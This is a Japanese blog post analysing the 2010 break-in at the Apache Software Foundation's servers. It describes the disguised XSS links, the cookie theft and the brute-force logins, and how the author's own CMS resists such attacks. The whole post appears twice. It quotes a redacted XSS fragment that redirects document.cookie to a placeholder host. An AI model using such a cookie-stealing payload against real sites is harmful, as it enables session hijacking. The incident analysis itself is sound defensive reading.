Apache、侵入を許す
2010年4月15日
マイコミジャーナルより
Apacheふたたび侵入を許す、その手口
Apacheサーバが6日から9日までの間、何者かによる侵入を受けパスワードなどの情報が盗まれた。どのような手口で侵入され、何がおこなわれたかを Apache Infrastructure TeamのPhilip Gollucci氏がapache.org incident report for 04/09/2010 : Apache Infrastructure Teamにおいて報告している。どういった手口で侵入が謀られたのかが詳しく説明されており参考になる。
この情報は、XSSを利用した攻撃が実際にはどのように行われるのかを考察する上で興味深い。
1)攻撃は、まずXSSから始まる。tinyurl.comを用いることによって、危険なURLであることを隠蔽して、何人かの管理者をXSSを仕込んだURLに誘導しようとした。
2)URLは、http://xxx.xxx/xxxx/xxxx.jsp?element=name;}catch{.... というもの。サイトHTMLのヘッダ部分に書かれたJavaScriptの脆弱性を付いているようである。詳しく書かないが、攻撃に気づかれないような工夫が色々としてある。ここで、'http://xxx.xxx/xxx.php?data='+document.cookieにリダイレクトすることで、クッキー情報を奪取している。
3)同時にブルートフォースで、10万通りのログインのトライが有ったらしい。
4)4月6日に、これらの攻撃のうちのいずれかが成功したとある。つまり、XSSによるクッキーの奪取が有効だったのか、ブルートフォースが有効だったのか、あるいはその両方が必要だったのか、明らかにしていない。
5)いったん管理者権限が奪取された後は、なすがままだったようだ。
マイコミジャーナルの情報では、XSSの後に総当り攻撃とあるが、元の英語の記事では、"On April 6th, one of these methods was successful."とある。XSSかブルートフォースのどちらかが成功したというニュアンス。
始め、マイコミジャーナルの記事だけを読んだ段階では、セッションクッキーの情報を元に、クラッカーのローカルコンピューターでブルートフォースを行ったのかと思ったが、どうやらそうではないようだ。
Jeansでは、単にセッションクッキーの漏洩だけでは管理者権限の奪取は行えないようになっている(Nucleusでも同じ)。また、Jeansのサイトに直接アクセスすることによる10万回のブルートフォースを行うのは、かなり難しい。少なくとも、IPv4では、現実問題として不可能である(数千の異なるIPアドレスが必要)。
Apacheふたたび侵入を許す、その手口
Apacheサーバが6日から9日までの間、何者かによる侵入を受けパスワードなどの情報が盗まれた。どのような手口で侵入され、何がおこなわれたかを Apache Infrastructure TeamのPhilip Gollucci氏がapache.org incident report for 04/09/2010 : Apache Infrastructure Teamにおいて報告している。どういった手口で侵入が謀られたのかが詳しく説明されており参考になる。
この情報は、XSSを利用した攻撃が実際にはどのように行われるのかを考察する上で興味深い。
1)攻撃は、まずXSSから始まる。tinyurl.comを用いることによって、危険なURLであることを隠蔽して、何人かの管理者をXSSを仕込んだURLに誘導しようとした。
2)URLは、http://xxx.xxx/xxxx/xxxx.jsp?element=name;}catch{.... というもの。サイトHTMLのヘッダ部分に書かれたJavaScriptの脆弱性を付いているようである。詳しく書かないが、攻撃に気づかれないような工夫が色々としてある。ここで、'http://xxx.xxx/xxx.php?data='+document.cookieにリダイレクトすることで、クッキー情報を奪取している。
3)同時にブルートフォースで、10万通りのログインのトライが有ったらしい。
4)4月6日に、これらの攻撃のうちのいずれかが成功したとある。つまり、XSSによるクッキーの奪取が有効だったのか、ブルートフォースが有効だったのか、あるいはその両方が必要だったのか、明らかにしていない。
5)いったん管理者権限が奪取された後は、なすがままだったようだ。
マイコミジャーナルの情報では、XSSの後に総当り攻撃とあるが、元の英語の記事では、"On April 6th, one of these methods was successful."とある。XSSかブルートフォースのどちらかが成功したというニュアンス。
始め、マイコミジャーナルの記事だけを読んだ段階では、セッションクッキーの情報を元に、クラッカーのローカルコンピューターでブルートフォースを行ったのかと思ったが、どうやらそうではないようだ。
Jeansでは、単にセッションクッキーの漏洩だけでは管理者権限の奪取は行えないようになっている(Nucleusでも同じ)。また、Jeansのサイトに直接アクセスすることによる10万回のブルートフォースを行うのは、かなり難しい。少なくとも、IPv4では、現実問題として不可能である(数千の異なるIPアドレスが必要)。